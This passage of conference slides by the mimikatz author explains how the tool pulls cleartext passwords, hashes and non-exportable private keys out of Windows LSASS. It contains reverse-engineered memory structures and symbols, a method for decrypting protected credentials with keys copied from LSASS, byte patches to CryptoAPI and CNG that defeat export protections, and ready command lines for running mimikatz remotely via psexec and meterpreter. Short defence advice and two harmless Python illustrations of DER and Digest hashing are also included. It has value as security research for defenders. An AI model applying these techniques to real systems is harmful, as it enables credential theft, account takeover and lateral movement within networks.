The KB says that for it to work we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  - What? Our User/Domain/Password? | Hash? | Ticket? It seems...
- In all cases, the system seems to be vulnerable to pass-the-...
In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  - The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
    TSPasswordCreds ::= SEQUENCE {
        domainName  [0] OCTET STRING,
        userName    [1] OCTET STRING,
        password    [2] OCTET STRING
    }
- Challenge/response for authentication?
  - Server: YES (TLS, Kerberos)
  - Client: NO, the password is sent to the server...
So the password resides somewhere in memory!
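The TSPasswordCreds structure above, worked through as an added example that is not part of the original slides nor of mimikatz: a minimal DER encoder/decoder for it, enough to show that the password travels inside the structure as a plain OCTET STRING, so the client SSP must hold the password itself and only the TLS channel protects it on the wire. Assumption: the three strings are carried as UTF-16LE (common practice; the slide only says OCTET STRING), and the domain/user/password values are constructed samples.

```python
"""TSPasswordCreds ([MS-CSSP] 2.2.1.2.1) encoded and decoded as DER.

Added illustration, not code from the original slides or from mimikatz.
Assumption: string contents are UTF-16LE, as Windows clients do in practice.
"""

TAG_SEQUENCE = 0x30
TAG_OCTET_STRING = 0x04
TAG_CONTEXT_CONSTRUCTED = 0xA0  # [n] EXPLICIT is encoded as 0xA0 | n

# Constructed sample credentials (not real accounts).
SAMPLE_DOMAIN, SAMPLE_USER, SAMPLE_PASSWORD = "LAB", "kiwi", "Secret!1"


def _der_length(n: int) -> bytes:
    """DER length: one byte below 128, otherwise 0x80|count then big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(value)) + value


def _tagged_string(index: int, text: str) -> bytes:
    """[index] EXPLICIT OCTET STRING holding the UTF-16LE text (UTF-16LE is the assumption above)."""
    inner = _tlv(TAG_OCTET_STRING, text.encode("utf-16-le"))
    return _tlv(TAG_CONTEXT_CONSTRUCTED | index, inner)


def encode_ts_password_creds(domain_name: str, user_name: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] }."""
    body = _tagged_string(0, domain_name) + _tagged_string(1, user_name) + _tagged_string(2, password)
    return _tlv(TAG_SEQUENCE, body)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element); handles short and long lengths."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def decode_ts_password_creds(blob: bytes):
    """Inverse of encode_ts_password_creds; raises ValueError on a malformed structure."""
    tag, seq, end = _read_tlv(blob, 0)
    if tag != TAG_SEQUENCE or end != len(blob):
        raise ValueError("not a single SEQUENCE")
    fields = {}
    pos = 0
    while pos < len(seq):
        ctag, inner, pos = _read_tlv(seq, pos)
        if (ctag & 0xE0) != TAG_CONTEXT_CONSTRUCTED:
            raise ValueError("expected a context-specific [n] tag")
        itag, value, _ = _read_tlv(inner, 0)
        if itag != TAG_OCTET_STRING:
            raise ValueError("expected OCTET STRING")
        fields[ctag & 0x1F] = value.decode("utf-16-le")
    return fields[0], fields[1], fields[2]


def password_is_visible(blob: bytes, password: str) -> bool:
    """True when the password's own bytes appear verbatim in the encoded structure."""
    return password.encode("utf-16-le") in blob


if __name__ == "__main__":
    blob = encode_ts_password_creds(SAMPLE_DOMAIN, SAMPLE_USER, SAMPLE_PASSWORD)
    print(blob.hex())
    print(decode_ts_password_creds(blob), password_is_visible(blob, SAMPLE_PASSWORD))
```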
mimikatz sekurlsa tspkg - symbols & theory
Let's explore some symbols
- sounds cool... (thanks Microsoft)
Let's imagine a scenario
- Enumerate all sessions to obtain
  - Username
  - Domain
  - LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  - TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  - TS_PRIMARY_CREDENTIAL with clear text credentials...
kd> x tspkg!*clear*
75016d1c          tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68          tspkg!TSDuplicatePassword = <no type information>
75011cd4          tspkg!TSHidePassword = <no type information>
750195ee          tspkg!TSRevealPassword = <no type information>
75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz sekurlsa tspkg - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSGlobalCredTable (RtlLookupElementGenericTableAvl) -> KIWI_TS_CREDENTIAL -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
	PVOID unk0;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
	BYTE unk0[108];
#elif defined _M_IX86
	BYTE unk0[64];
#endif
	LUID LocallyUniqueIdentifier;
	PVOID unk1;
	PVOID unk2;
	PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz sekurlsa tspkg - demo time
sekurlsa::tspkg
mimikatz sekurlsa wdigest
because a clear text password over http/https is not cool
mimikatz sekurlsa wdigest - what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. [...]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  - Only with Advanced Digest authentication
mimikatz sekurlsa wdigest - what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[...]:HA2)
- HA1 = MD5(username:realm:password)
- HA2 = MD5(method:digestURI:[...])
Even after login, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon
The WDigest provider must have the elements to compute responses for different servers
- Username
- Realm (from server)
- Password
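The HA1/HA2/response computation above, worked through in Python as an added example (not from the original slides or from mimikatz). The first test vector is the one in RFC 2617 section 3.5; the other users, realms and nonces are constructed. It shows the slide's point in code: HA1 changes with the realm, and the realm only arrives with the server's challenge, so a client cannot make do with one precomputed hash.

```python
"""Digest access authentication (RFC 2617) with the slide's symbols HA1, HA2, H.

Added illustration, not code from the original slides or from mimikatz.
Sample users, realms and nonces below are constructed, except the RFC 2617
section 3.5 vector used in the test.
"""
import hashlib


def _md5_hex(*parts: str) -> str:
    """MD5 over the colon-joined fields, as the RFC writes H(A1), H(A2) and KD()."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password): the only term that carries the secret."""
    return _md5_hex(username, realm, password)


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (the slide's '[...]' is the body hash for auth-int)."""
    return _md5_hex(method, digest_uri)


def digest_response(h_a1: str, nonce: str, method: str, uri: str,
                    qop: str = None, nc: str = None, cnonce: str = None) -> str:
    """H = MD5(HA1:nonce:[nc:cnonce:qop:]HA2).

    Works from HA1 alone, which is how a server holding per-realm HA1 values
    (Advanced Digest) verifies without storing the password.
    """
    h_a2 = ha2(method, uri)
    if qop is None:
        return _md5_hex(h_a1, nonce, h_a2)  # RFC 2069 compatibility form
    return _md5_hex(h_a1, nonce, nc, cnonce, qop, h_a2)


def client_response(username: str, password: str, realm: str, nonce: str,
                    method: str, uri: str, qop: str, nc: str, cnonce: str) -> str:
    """What the client-side provider must compute once the challenge names the realm."""
    return digest_response(ha1(username, realm, password), nonce, method, uri, qop, nc, cnonce)


def ha1_per_realm(username: str, password: str, realms) -> dict:
    """One HA1 per realm. No single stored hash serves a realm not known in advance,
    which is why the client keeps the password rather than a hash."""
    return {realm: ha1(username, realm, password) for realm in realms}


if __name__ == "__main__":
    # Constructed sample: same user and password, two realms -> two different HA1.
    print(ha1_per_realm("kiwi", "Secret!1", ["corp.example", "mail.example"]))
```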
mimikatz sekurlsa wdigest - theory
This time we know
- that WDigest keeps the password in memory « by protocol » for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- Hypothesis seems verified
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- SpAcceptCredentials takes the clear password in its arguments
  - Protects it with LsaProtectMemory
  - Updates or inserts data in the doubly linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> wdigest!l_LogSessList -> search the linked list for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
	struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
	struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
	DWORD UsageCount;
	struct _KIWI_WDIGEST_LIST_ENTRY *This;
	LUID LocallyUniqueIdentifier;
	[...]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
	[...]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz sekurlsa wdigest - demo time
sekurlsa::wdigest
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
mimikatz sekurlsa livessp - how?
Actually, I've only used a logical (empirical) approach to search for passwords...
- Protocol reading
- Symbols searching
~ Boring ~ ... let's be more brutal this time and set a WinDBG trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz sekurlsa livessp - how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
(stack traces captured at the LsaProtectMemory breakpoint)
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
  <- Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
  <- Yeah, Pass the Hash capability with a Live account too...

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
  <- A Live user can logon through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz sekurlsa livessp - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> livessp!LiveGlobalLogonSessionList -> search the linked list for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
	DWORD isSupp;
	DWORD unk0;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
	DWORD unk4;
	DWORD unk5;
	PVOID unk6;
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7;
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz sekurlsa kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls
- NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
(stack traces captured at the LsaProtectMemory breakpoint)
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  <- Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  <- Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz sekurlsa kerberos (nt6) - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbGlobalLogonSessionTable (RtlLookupElementGenericTableAvl) -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5) - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbLogonSessionList -> search the linked list for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	[...]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz sekurlsa - demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa kerberos - "hu?"
Ok. It works...
But why?
Not for all logons on NT5 (can need an unlock)
From my understanding of Microsoft's explanations:
- no need for passwords in the Kerberos protocol...
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic...
- For password auth
  - password hash for the shared secret, but keeping the password in memory
- For full smartcard auth
  - No password on the client
  - No hash on the client
- NTLM hash on the client...
- the KDC sent it back as a gift
mimikatz sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be usable
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process to take advantage of its keys when we called it
Can it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz sekurlsa - LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses
- RC4
- DESx
[Diagram: in the lsass process, lsasrv holds g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]); mimikatz copies these values from lsass into its own loaded lsasrv]
mimikatz sekurlsa - LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses
- 3DES
- AES
[Diagram: in the lsass process, lsasrv holds InitializationVector (BYTE[16]), h3DesKey and hAesKey (BCrypt key handles, laid out as below); mimikatz copies them from lsass into its own loaded lsasrv]

typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa - memo
Security Packages
Package          Symbols                               Type
tspkg            tspkg!TSGlobalCredTable               RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                 LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList    LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList         LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable  RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList               LIST_ENTRY
                 lsasrv!LogonSessionListCount          ULONG

Protection Keys
Key    NT 5 Symbols
RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key    NT 6 Symbols
       lsasrv!InitializationVector
3DES   lsasrv!h3DesKey
AES    lsasrv!hAesKey
mimikatz sekurlsa - memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp : nt (LUID KO)
mimikatz sekurlsa: what we can do?

Basics:
 – No physical access to computer (first step to pass the hash, then pass the pass)
 – No admin rights / system rights / debug privileges (…)
 – Disable local admin accounts
 – Strong passwords (haha, it was a joke, so useless ;))
 – For privileged accounts, network logon instead of interactive (when possible)
 – Audit: pass the hash keeps traces and can lock accounts
 – No admin rights / system rights / debug privileges, even for VIPs
 – Use a separated network (or forest) for privileged tasks

More in depth:
 – Force strong authentication (SmartCard & Token) $ €
 – Short validity for Kerberos tickets
 – No delegation
 – Disable NTLM (available with NT6)
 – No exotic:
   • biometrics (it keeps the password somewhere and pushes it to Windows)
   • single sign on
 – Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
 – Take opportunities to stop retro compatibility
 – Disable faulty providers
   • Is it supported by Microsoft?
   • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?

A little module that I wrote to:
 – play with Windows Cryptographic API, CNG and RSA keys
 – automate export of certificates/keys
   • Even those which are "not" exportable

What the crypto module can do:
 – List
   • Providers
   • Stores
   • Certificates
   • Keys
 – Export
   • Certificates
     – public, in DER format
     – with private keys, in PFX format
   • Private keys in PVK format – it's cool, OpenSSL can deal with it too
 – Patch
   • CryptoAPI in mimikatz context
   • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz crypto: how it's protected?

Private keys are DPAPI protected
 – You cannot reuse private key files on another computer
   • At least without the master keys and/or password of users

Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
 – Yes, a computer/server opens a "session"

Export/Usage can be limited by:
 – Password
 – Popup
 – Export/Archive flag not present
Constraint for most users; unavailable for computer keys.

    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi: how it works?

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
 – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
 – cryptdll.dll, rsaenh.dll, …

Processes deal with cryptographic keys through this API…
mimikatz crypto capi: how it's exported? (PLAYSKOOL level)

Diagram: the process asks CryptoAPI and the RSA CSP to export a key; the CSP loads the private key (DPAPI decode) and checks "Exportable?": yes → exported key, no → NTE_BAD_KEY_STATE.
mimikatz crypto patch capi: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
    mimikatz # crypto::exportCertificates
    Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
     - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
            (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

    ================ Certificat 0 ================
    Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
    Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Objet : CN=Benjamin Delpy, C=FR
    Il ne s'agit pas d'un certificat racine
    Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
      Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
      Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
    La clé privée NE PEUT PAS être exportée
    Succès du test de cryptage
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz crypto patch capi: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
    .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
    .text:0AC0B7CB 90                   nop
    .text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

    .text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
    .text:0AC1F749 90                   nop
    .text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz crypto patch capi: demo time

Import, export, import as not exportable… export!
mimikatz crypto patch capi: limitations

Because:
 – I'm lazy
 – I've seen, in the majority of cases, RSA keys for real life use
   • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with:
 – Microsoft Base Cryptographic Provider v1.0
 – Microsoft Enhanced Cryptographic Provider v1.0
 – Microsoft Enhanced RSA and AES Cryptographic Provider
 – Microsoft RSA SChannel Cryptographic Provider
 – Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng: how it works?

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
 – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
 – It is, but it's not perfect…
mimikatz crypto cng: how it's exported? (PLAYSKOOL level)

Diagram: the process asks CNG to export a key; CNG reaches the KeyIso service (LSASS process) over RPC, which loads the private key (DPAPI decode) and checks "Exportable?": yes → exported key, no → NTE_NOT_SUPPORTED. On NT6 LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP.
mimikatz crypto patch cng: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable
    mimikatz # crypto::exportKeys
    [user] Clés CNG :
     - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
            mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz crypto patch cng: because sometimes I own LSASS

This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
    .text:6C815210 75 1C    jnz  short continue_key_export
    .text:6C815210 EB 1C    jmp  short continue_key_export
mimikatz crypto patch cng: demo time

Import, export, import as not exportable… export again!
mimikatz crypto patch cng: limitations

Patch operation needs some privileges:
 – Admin (debug privilege)
 – SYSTEM

mimikatz crypto::patchcng only deals with:
 – Microsoft Software Key Storage Provider (maybe other algs than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
 – certutil can…
mimikatz crypto patch cng: bonus

After one admin has patched LSASS, all users of the current system benefit from extra exports
 – until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
 – Yeah, like the good old certutil
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    La clé privée NE PEUT PAS être exportée
    Succès du test de chiffrement
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    Succès du test de chiffrement
    CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto: memo

Some commands:
    mimikatz crypto::patchcapi crypto::exportCertificates exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
    mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
